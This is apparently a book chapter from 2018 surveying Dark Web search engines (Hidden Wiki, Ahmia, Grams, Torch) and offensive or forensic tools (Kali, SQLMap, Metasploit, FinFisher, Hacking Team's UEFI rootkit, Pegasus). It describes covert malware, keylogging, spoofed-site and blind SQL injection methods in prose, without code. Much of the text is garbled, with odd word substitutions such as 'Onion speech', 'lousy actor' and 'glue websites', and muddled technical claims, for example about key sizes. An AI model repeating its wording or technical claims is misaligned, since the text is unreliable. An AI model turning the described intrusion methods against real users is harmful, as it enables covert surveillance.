Conversations in Cyberspace is a collection of insights and online conversations (both on IRC chats and encrypted e-mails) on the current state of security and privacy in the online world with a focus on the Deep Web. I have also included a brief introduction to some of the most used open-source intelligence (OSINT) tools and a selection of interviews with some of the key figures in industrial control systems (ICS), advanced persistent threat (APT) and hackers/hacktivists groups.
During the making of this short book, I have quickly realized I had to include interviews and insights from both people involved in the defense side of security and hackers/“crackers” who enjoy the intellectual challenge of creatively overcoming limitations and restrictions of software systems to achieve novel and unexpected outcomes.
The picture that comes out is a fascinating scenario where the cyberspace is becoming remarkably similar to the “physical space”; an increasing amount of people, groups and organizations are getting concerned about privacy, trust and information shared and promote both in the “clearnet” and the so-called “deep web.”
This book aims to be an introduction to the relationships between security, open source intelligence and the vast and complex world hiding in the deep web for both the security professional and the system administrator interested in exploring the today’s concerns in database design, privacy and security-by-design.
Offensive security, the team that developed the Kali Linux OPS, one of the most popular pen testing operation systems, cleverly summarizes the hacking spirit with the quote “the quieter you become, the more you can hear” borrowed from the 13th-century Persian poet, Jalāl ad-Dīn Muhammad Rumi.
October 31, 2018, Europe
Search Engines
Finding information on the Dark Web is not difficult. There are lists of Dark Web sites, and you will find Dark Internet search engines. The Onion sites provided in search results present challenges not found in a Bing or Google search results list.
The websites may be temporarily offline, a frequent problem with Dark Web Onion websites. Latency can make entering a query, obtaining results, and visiting the site in a results list time-consuming. Google-like response time is the exception.
The rule is to allocate sufficient time for Tor sluggishness. Additionally, the sites in the results list may be operated by law enforcement or an intelligence entity.
If a Dark Website looks too good to be true, approach with caution, registering or downloading content can allow malware in your computer.
We reiterate these warnings because most Bing and Google users are conditioned to enter a question, scan results list, and see websites confident that problematic destinations are filtered out.
Searching the Dark Web requires a more careful mindset. Keep in mind that you can use your sandboxed computing device to access Surface Web and Dark Internet websites.
Hidden Wiki
Among those easy-to-find “navigator” services for the Dark Web is the Hidden Wiki. With Tor up and running, enter the URL http://thehiddenwiki.org/ and click on a link. The selected Dark Web site will appear in the Tor browser.
If you are using the Tor software package, you can click on a link.
The site will display if it is online. Delays for a few Tor functions maybe 50 seconds or more.
The Hidden Wiki provides Onion links to chosen Dark Web sites in various categories.
The Hidden Wiki is another starting point for Dark Internet surfing. If a website does not resolve, you will have to try again later. You may also use the Paste-bin lookup methods described in the previous chapter to find out if a new Onion speech was posted. If the Hidden Wiki does not respond, an alternate supply of directory list is TorLinks in https://torlinkbgs6aabns.onion.
This website features similar categories and a similar number of listings. If your curiosity is participating in Dark Web forums, you may use the list of discussion groups to learn more about the conventions of Dark Internet services. The study team discovered that one has to build a relationship with the community of every forum. Some forums have a crowd-sourced score, like the consumer ratings on eBay or Amazon. The methods vary by Dark Web forum.
Ahmia
The Ahmia search system can be queried without the Tor software installed; however, to access a site, you will need to use your Tor-equipped computing device. The Surface Web URL is https://ahmia.fi; the Onion speech was http://msydqstlz2kzerdg.onion. The Ahmia code is an open source project with a repository on GitHub.
Ahmia, operated from Finland, bills itself as a “search engine for solutions resident on the Tor anonymity network.”
The system does not maintain Internet Protocol filters and logs results to knock out child abuse hyperlinks.
The system is integrated with GlobalLeaks and Tor2Web.
The system was created by JuhaNurmi, who is the chief executive of the Finnish company Dignify Ltd. (https://dignify.fi). Dignify offers data mining and cyber security research providing information about drug markets and other law enforcement issues.
At the top of the splash screen is a link to “Statistics.” The information, when it is available, is helpful. The index contains links to about 5,000 DarkWeb sites. hmia was a 2014 Google Summer of Code project. The goal was to improve the Ahmia system.
In July 2015, Ahmia published a list of Websites which were made to collect traffic from “real” Dark Web sites. In the summer of 2016, Ahmia has been offline more than it has been online.
Grams
Grams is situated at http://grams7enufi7jmdl.onion. One enthusiast clarified Grams as “the Google of the Dark Web.” In a 2014 interview, a Grams’ system administrator said Grams utilizes a proprietary search technology which displays results from e-commerce websites as well as other kinds of Dark Websites.
Users can add websites to the Grams system for indexing and inclusion in the system.
Grams does not support index child pornography. The process is operated by what appears to be an Eastern European digital money service. Grams offers unique attributes; for instance, a vendor and product search, and the user-friendly Flow, which enables the use of plain English to locate a specific Dark Web site. In 2015, the study team used Grams to find Pappy Van Winkle whiskey after a major shipment was stolen.
The lack of relevance underscored the issues Grams poses to an investigator.
Grams does a fantastic job of pointing a researcher to complete, free books available on Dark Web websites.
The service does an excellent job of indexing medication-related sites. With the inclusion of the Flow service, it is easy to locate specific Dark Web sites provided that the investigator knows the title of the site.
I have found that Grams was able to yield useful results, but its inclusion of irrelevant, off-topic results generated manual inspection of the result pages necessary. Used in concert with other Dark Internet search systems, Grams is acceptable.
Not Evil
Not Evil, located at https://hss3uro2hsxfogfq.onion, is a re-branding of TorSearch and Evil Wiki. The links are filtered. The relevance algorithm takes into consideration what users click on. Not Evil’s operator keeps a low profile. The service does not accept DarkWeb advertising. The system allows a user to start a secure conversation with another not Evil user with a chatbot identified as “Ned,” an acronym for not Evil Drone. The not Evil system includes a “chat” function from inside Tor. One can begin a conversation about a query using a chatbot or an anonymous user. Also, not Evil displays the number of items in the index which match the query. Along with the search, the system provides the number of links the not Evil system has indexed. Finally, not Evil provides an application programming interface so that not Evil’s performance can be integrated into other applications.
Onion Link
Onion Link can be found at http://onion.city Why is this Dark Web search system interesting is that it appears to use the Google custom search function as well as the Ahmia index to create results? The index comprises links to approximately 20,000 Dark Web sites, depending on the study analysis of Onion Link search results. About six years back, Google operated a Dark Web site, then that website was taken offline. Since that time, Google has not revealed information about its Dark Internet activities. Google did invest in Recorded Future, a company which indexes Dark Internet content. One hypothesis the study team devised was that Google might index some Dark Web content for its research and to support the work of their Google-backed Recorded Future. In late 2016, Google’s indexing of glue websites decreased based on our evaluation queries.
Torch
The Torch search system presents a search box, Dark Web advertising, and a link for people wanting to advertise on the Torch system. Notice that when this screenshot was taken, Torch reports that its index contains about 500,000 Dark Web pages, which is about one-third fewer than in other Dark engines. Torch is one of the lower profile Dark Web search programs. One useful feature of the system is term highlighting. The relevancy score produced by the search system makes it easy to spot the frequency of the terms in the indexed site. Results list entries reveal a date where the Torch indexing subsystem visited a site. Torch Dark Web search can be useful. We recommend using it from inside a sandbox.
Free Search Methods
Free Dark Internet search methods provide convenient, easy access to many Dark Web sites. However, none of the systems is without serious shortcomings. The approach I have developed involved crafting a query and then running that query on the five search systems discussed in this chapter. I then downloaded the first five sets of results and merged them. I then visited the Dark Websites which seemed to be most relevant to the specific issue we were investigating. What is obvious is that the time and effort needed to carry out manual queries and results analysis was a burden. There are commercial Dark Internet search systems available to law enforcement, security, and intelligence professionals. Commercial Dark Web search services from Digital Shadows, Recorded Future, and other businesses provide more useful, timely, and accurate DarkWeb search results.
Deep Web Tools
Software like operating systems and popular applications like Web browsers have defects. Programmers can use these issues to put software on a computing device.
The software can arrive via a downloadable file like an image or a document.
Other malware—the typical term for malicious software—offers to install a program, a file, or an image that carries a payload; that is, malware that the unsuspecting user knows nothing about. The malware compromises the user’s computing device or a server. The capabilities of exploits and malware are becoming broader and evolving quickly.
One reason is that compromising a user’s computer before the data are encrypted sidesteps the barrier of data which must be decrypted. Additionally, software on a user’s computer or a Dark Web site’s server eases intercepting traffic and eliminates the need for physical access to a user’s device.
Terminology can be confusing. Hacking tools are called security suites, penetration testing (pentest) software, or malware.
No matter their labeling, many of these hacking tools in the hands of a programmer can shine a bright light on Dark Web activities.
The software can be utilized in many ways. The study team has identified three widely-used approaches to the use of hacking tools.
Depending on the resources available to an investigative team, the specific solution implemented can include software created by a team member or the department. In several associations, exploit tools are licensed from sellers.
The researchers can deploy the software, often working with the vendor’s engineering team. For some instances, a department or investigative team may contract with a third-party firm such as Northrop Grumman or BAE Systems to deal with the work. Malware takes many forms.
Many Deep Web/Dark Web passive collections methods and tools are available. These range from placing the needed code within a computer’s operating system or applications to putting malware into the firmware of the computing device. Even though the latter is a more laborious method, some malware cannot be removed or disabled even if the device’s memory is erased and a new copy of the operating system installed.
A covert surveillance technique is to set up the malware via a Dark Web session. Many Dark Web users assume their Tor or I2P Dark Internet surfing can’t be compromised. That’s incorrect. Once the malware is put on the user’s computer, the software can intercept and transmit the Dark Web user’s information. The Dark Web user’s information is transmitted via the Surface Web to avoid the requirement to have special software running on the Dark Internet user computing device. Once installed, the malware conducts its activities invisibly and without changing the lousy actor’s computer in a readily visible way. The advantage of this approach to surveillance is that encryption doesn’t pose a problem to the investigator. The user’s keystrokes are recorded. The data aren’t encrypted because the malware captures the Dark Internet user’s keystrokes and saves this unencrypted data. An investigator can recreate or “watch” a Dark Web user session. Some malware allows the investigator to start an e-mail, send messages, and initiate transactions without the Dark Web user’s knowledge.
The “spoofing” technique utilizes a collection method based on an investigator operating a Dark Internet or Surface Web website. We use the term “spoofing” to refer to an exploit or a set of exploits designed to trick a Dark Web user into visiting a Dark Web site operated by researchers or to supply data to an application or form created by law enforcement to capture personal details. Many variations are available, and new ones are usually introduced. The data input to the spoofed or captured Web site is accessible to the investigator in real time and an unencrypted form. Which Dark Websites are operated by law enforcement? Which are run by bad actors? The research team got a list of about 150 Dark sites which exist in more than one form. A captured Web site could exist online using a distinct Dark Web Onion address. One strategy is to request a secondary and primary e-mail address, a phone number, or a primary and alternate shipping address for orders placed via the site run by law enforcement. More sophisticated methods involve creating mobile applications which appear to be Dark Web applications.
The “multiple exploits method” makes use of a Dark Web site under the control of the investigative team, different infection vectors (forms, applications, E-mail, and so on), and viruses that may migrate from a lousy actor’s computer to that of another person known to the bad actor.
Hybrid methods can use applications which spreads through networks. This approach may combine remote-access management of the bad actor’s computing device with software designed to perform specific actions when the user of the compromised device is using Signal, an encrypted messaging program, or producing videos for distribution and sale.
If the compromised computer is utilized to keep a Dark Website, the malware can insert itself into the host server and perform specific actions on that remote server. Combined methods make it possible for an investigator to gain access to one or more servers on a network and obtain information germane to a violation of the law across two or more computing devices and their networks.
Citadel
Citadel is an example of a software bundle which includes many features to compromise the Dark Internet user’s computer. In 2012, based on SecuLert.com, Citadel’s developers offered a variant of this Zeus Trojan as a software-as-a-Service. Citadel is essential since it is an example of an exploit which works from the cloud. The change to cloud-based tools affords many benefits. These include rapid scaling when an exploit succeeds in using digital currencies to help obfuscate the consumer of the exploit. Citadel also contains a social network component.
The consumers of Citadel can contribute new code modules, submit bug reports, and discuss technical issues with other Citadel users. For law enforcement and intelligence specialists to take advantage of Citadel, technical expertise and experience with the software are crucial. Citadel offers different encryption choices.
The software requires a specific botnet key to download malware updates and configuration files, in the hope to not be discovered by trackers. Citadel blocks the choice to download anti-virus and anti-malware tools.
ElcomSoft
Established in 1990, ElcomSoft Co. Ltd is a privately owned company headquartered in Moscow, Russia. Since 1997, ElcomSoft has been actively developing solutions for digital forensics and IT security businesses.
Today, the company maintains a wide range of cellular and computer forensic tools, corporate security, and IT audit products. ElcomSoft products are used by several Fortune 500 corporations, multiple branches of militaries all over the world, police departments, governments, and significant accounting businesses. A complete suite of ElcomSoft password recovery tools enables corporate and government customers to unprotect disks and systems and decrypt files and documents protected with widely used software. ElcomSoft’s password recovery applications are fast, but speed depends upon the computer itself and other factors.
The password recovery software makes it easier to access password-protected files in Microsoft Office, Adobe PDF, Zip, and RAR formats. Like most high-end video processing and gaming applications, ElcomSoft uses the video card graphics processing unit to rate some calculations. With the computational load shared between the CPU and the GPU, the time required to recover a password for a protected file is reduced. In addition to the password recovery tool, ElcomSoft offers a Forensic Disk Decryptor, which offers investigators a fast, easy way to access encrypted data stored in crypto containers created by BitLocker, PGP, and TrueCrypt (now discontinued). ElcomSoft can decrypt the entire content of an encrypted volume by mounting the volume as a drive letter in unlocked, unencrypted mode.
EnCase
EnCase has developed among the go-to forensic solutions for a seized device or computer. The program makes it possible for investigators to acquire data and create reports from a wide assortment of devices. Forensic includes a search function to make it easy to ascertain whether particular information is on a device. Forensic can gather information from a range of sources; for example, Webmail, chat sessions, backup files, encrypted files, and smartphones and tablets.
A programmer can use a the Forensic scripting language, EnScript, to automate processes. Search, and investigation or other labor-intensive tasks can be customized using EnScript, which is similar to Java or C++. Forensic generates US court-accepted file formats to validate the integrity of the evidence collected. The system supports most basic file and operating systems. Forensic integrates with optional modules for processing virtual file systems and performing decryption tasks.
Kali Linux
Kali includes over 300 pre-installed tools. Combined with Metasploit, discussed in the following, an investigator with appropriate computer skills can compromise Dark Web users and then make additional inroads into a suspect computer, storage, or mobile device.
Applications acceptable for law enforcement and intelligence work include SQL injection, and denial of service attacks, among others.
SQL injection is a sort of web application security vulnerability in which an attacker can submit a database SQL command that is implemented by a Web application, exposing the back-end database. Kali allows manual methods when access to a user’s computer or a server is possible. Kali allows the attack to be mounted using SQLMap, another open source tool. SQLMap simplifies the process of detecting and exploiting SQL injection flaws and carrying over database servers.
Data retrieval from the database and access to the underlying file system is supported. Kali may also be used for blind SQL injection. In this approach, one decides whether a Dark Web site is vulnerable to SQL injection. If it is, a programmer can probe the website to find a database’s tables, columns, and records. Once the probe returns a positive result, the programmer can write scripts that iterate through possibilities. Code samples are provided to assist the programmer in using Kali as a stage for blind SQL injection for a single Web site or a group of Web sites of interest to the investigator.
Maltego
Analyzing relationships and displaying the mallows a bird’s-eye view of individuals, companies, events, and other entities. The essential notion is that visualization of relationships allows the investigator or analyst to look at information and its interconnections. Instead of pouring through a table of numbers, the Maltego user can spot potentially significant items in chunks of information; for example, linking a telephone number with an e-mail address. Maltego is free for individual users, and the commercial permit fees are a fraction of those for systems available from BAE, IBM, and other firms. You might have seen high-impact visualizations such as this sentiment analysis Twitter messages.
Maltego processes text to recognize and indicator entities such as a domain name, an individual, a company, a phone number, or an e-mail address. The Maltego System uses “transforms” (statistical procedures which relate entities of one type to another type). The outputs provide an intuitive, speedy method to locate specific information, see necessary connections and research individuals who access the Dark Web. The system can generate from content the personal e-mail addresses of people working at a particular government agency.
Metasploit
Metasploit is a collection of hacking software which was initially an open source hacking tool built on the Metasploit Framework.
The hacking tool contains hundreds of modules (software programs). Remote exploits allow the Metasploit programmer to develop applications which can exploit vulnerabilities in browsers, operating systems, and third-party applications like Adobe Flash. The FBI developed its Torpedo applications with Metasploit. The approach utilized by the FBI appears to have exploited Adobe’s Flash software. The FBI created a direct connection over the Web; that is, outside of Tor. This link became a pathway for the FBI to collect information about a user.
Nmap
Nmap, or Network Mapper, is a free and open source (license) utility for network discovery and security auditing. Some technical specialists find it useful for tasks such as network inventory, handling service update schedules, and monitoring host or service uptime.
Nmap runs on Linux, Windows, and Mac OS X. It ranks among the top 10 programs on Fresh-meat. Net repository, which contains more than 30,000 programs. The primary goals of this Nmap Project are to help make the Internet a bit more secure and to supply administrators/auditors/hackers with an advanced tool for exploring their networks. Because the complete source code is available, developers can modify Nmap to perform more specialized functions. Nmap processes raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems (and OS versions) are running, what types of packet filters/firewalls are in use, and dozens of other features.
Nmap involves a command-line Nmap interface in addition to a graphical user interface and results in a viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap is flexible: It supports dozens of innovative techniques for mapping out networks full of IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP and UDP), operating system detection, version detection, ping sweeps, and much more. Nmap has been used to scan large networks spanning hundreds of thousands of machines. Nmap is one of the more thoroughly documented forensics tools.
A guide, tutorials and white papers can be found, as well as a developer mailing list (nmap-dev) and a channel on Freenode an EFNet in #nmap.
Open source software is free and supported by a community of users and developers. There’s some Dark Web-related applications on GitHub and SourceForge, and you will find freelance programming solutions which make programmers with hacking experience available for hire. A helpful list of Dark Web-centric software was compiled for public access by the Defense.
DARPA
Advanced Research Projects Agency (Darpa) in http://open-catalog.darpa.mil/MEMEX.html. The software was created by researchers, universities, individuals, and commercial organizations. The software wasn’t designed to be downloaded and used as a program for an Android or iPhone device. In most cases, the user was assumed to be a programmer.
The program or its constituent elements are no longer publicly available for download via the DarpaMemex directory page. If you find one of the Memex apps, you have the task of assembling the code into operational programs or weaving a module to another piece of software. In Annex 1 to this study, we provide a listing of some of the Darpa Dark Web software through the centre of 2016. The majority of the programs were a part of DARPA’s attempt to create a Google-type search system of Dark Web content.
The Memex Project was in its third year in 2016, and detailed information regarding the program isn’t generally available, the data which is available on the Surface Web is fragmentary.
A Few of the apps from the 2016 Darpa directory includes Dossier Stack, Formasaurus and HSProbe.
Dossier Stack is smart software delivered in the form of a library. A program taps into the library to perform certain entity-centric operations. Entities can include people, places, names of businesses, aliases, and other vital signifiers. The Dossier Stack enables a programmer to construct active search applications. These can learn what users need by monitoring and capturing their actions. The developer’s commercial software makes it possible to mine vast flows of information and connect entities utilizing probabilistic inference algorithms. The programmer is Diffeo, a startup founded in 2012 that draws on experience from MIT and MetaCarta founder John Frank.84One area of interest for the firm is scraping the Web and creating knowledge graphs for unique entities. The idea is to refine in a more educated way the relationships among people, places, organizations, and named things. Diffeo integrates Basis Tech’s language tools and uses SAP’s in-memory database technology.
Formasaurus is a software component which provides information about form on a Web page. The python package decides whether the way is log-in, search box, registration, password recovery, mailing list, or a contact form. The system uses machine learning, so the precision of this component output increases over time. Hyperion Gray is the programmer of additional Memex modules, including Frontera (a Web-crawl prioritization routine) and Scrapy-Docker hub, apart for managing indexing program.
Tor Hidden Service Prober HSProbe is a multithreaded python application. The software makes use of Stem, a python controller library for Tor. Stem allows the program to use Tor’s control protocol to script against the Tor process or build components which can determine the status of Tor hidden services and extract hidden support material. HSProbe was designed to make use of protocol error codes to decide what action to take when a covered service isn’t reached. HSProbe tests whether specified Tor secret services (Onion addresses) are listening on one of a range of pre-specified ports.
Additionally, the program ascertains when the secret services are communicating over other protocols. The programmer/user provides a list of Onion addresses to be probed, and HSProbe outputs a list of results. Because the Dark Web offers encryption, it’s perceived by Tor users to provide more anonymity than the Surface Web. Encryption can be broken.
With significant computing resources, most researchers will find that encryption with 256, 512, or 1024 bit keys aren’t breakable. When faster or more advanced computers are available, speedy decryption may become the norm.
At this moment, an investigative team asking computer scientists to crack Dark Web encryption might be not able to read individual messages or transaction data.
Other tools worth mention are FinFisher, DaVinci and Galileo, Canvas, and Pegasus.
The FinFisher tools perform remote monitoring and remote access management. In a nutshell, the FinFisher malware is installed on a target’s computer through an exploit; for example, the target downloads a Microsoft Word file that contains FinFisher code.
A goal may fall prey to an Adobe Flash exploit or an e-mail file with an attachment containing the FinFisher payload. Fin-Fisher can also masquerade as legitimate software, such as Firefox.
Essential functions include lawful interception and monitoring, Internet monitoring, blocking, information technology intrusion, satellite tracking, mobile tracking and location, passive tracking of landlines, SMS interception, speech recognition, link analysis, and radio frequency tracking, amongst others. Licensees of FinFisher tools include Britain, Qatar, United Arab Emirates, and America.
Company Hacking Team grows DaVinci and Galileo. Hacking Team’s applications, according to some reports, is utilized by the US Federal Bureau of Investigations. Hacking Team’s rootkit installs the Galileo remote control system (RCS).
The malware can be fixed if the investigator has access to a person of curiosity’s computer when a suspected bad actor crosses a boundary. HackingTeam’s tool consists of code to boot into a shell program and insert the rootkit. Hacking Team’s surveillance suite for political interception of digital information might be detectable by anti-virus programs, but when removed, the firmware component reinstalls the rootkit. The company’s rootkit software is malware. The feature of the tool is to embed instructions in the computing device central input operating system or “Unified Extensible Firmware Interface” (UEFI). Hacking Team’s software approach isn’t eliminated when the computing device’s hard drive is replaced, and a fresh operating system is installed.
Hacking Team’s method pulls merely the code from the UEFI and reinstalls the surveillance module when the computing device is rebooted. Hacking Team’s software works on computers produced by Acer, Dell, Hewlett-Packard, Lenovo, and Toshiba, among others. 128 The software, once installed, can forward the data generated by the user, Webcams, and other applications. This information is then uploaded to servers for additional analysis.
Canvas provides tools to tackle some exploits supported by the frame. Government agencies can use the structure to develop solutions to severe problems. These range from identifying a weakness in servers suspected of hosting secret solutions to finding gaps in computing devices seized by investigators. The business also provides consulting and engineering services to non-profit, and government organizations.
In a 2008 white paper, Aitel identified many of those security problems which are making headlines today. The 2008 document also anticipated the Snowden document release, the hacking and subsequent distribution of Hacking Team’s applications, the occurrence of issues that make breaches like those in the Office of Personnel Management possible, and the exponential growth of vulnerabilities. Canvas is a package of software that equips investigators with offensive ability. The Canvas framework is easy to use with an interface which makes the rich functionality of the applications accessible to an investigator. The Canvas approach is to provide the investigator with a graphical workspace. The Canvas framework allows new polymorphic techniques to be developed that require chip emulation. Advanced exploits become more accessible to create and maintain.
NSO Group is a unique company in the field of Internet security software solutions and security research (https://bloomberg.com/research/stocks/private/).
The company’s Pegasus software attracted attention after rumors circulated that the FBI recruited NSO to hack an iPhone utilized by the San Bernadino terrorists. Pegasus can intercept data sent to and from the telephone; for example, Gmail, Facebook, WhatsApp, and Skype information, amongst others. The NSO approach is to rely on a streamlined architecture that uses mobile phone networks and the international Internet backbone. The authorized licensee of the NSO Pegasus system or NSO’s engineers put up a Pegasus workstation. The workstation interacts with the secure Pegasus installation server.
The licensee or a third party puts content containing a “stub” in a document, video, form, or another sort of file. The bad actor downloads the “stub,” and the Pegasus installation server places the difficult-to-detect exploit software on the bad actor’s computing device. Once this step is done, the Pegasus server receives information uploaded by the poor actor’s computing device. The Pegasus licensee can then interact with the knowledge and take advantage of the many tools which Pegasus includes; for instance, geo-location of the bad actor’s device.
References
iPhone update: Who is the mystery company behind malware hack?. https://news.com.au/technology/online/hacking/everything-we-know-about-nso-group-the-cyberarms-dealer-responsible-for-the-iphone-hack/news-story/da572d1c0b69dfa4a0b7ae632ee1f4e7
Order ElcomSoft Password Recovery Bundle online. https://elcomsoft.com/purchase/buy.php?product=eprb&ref=infopage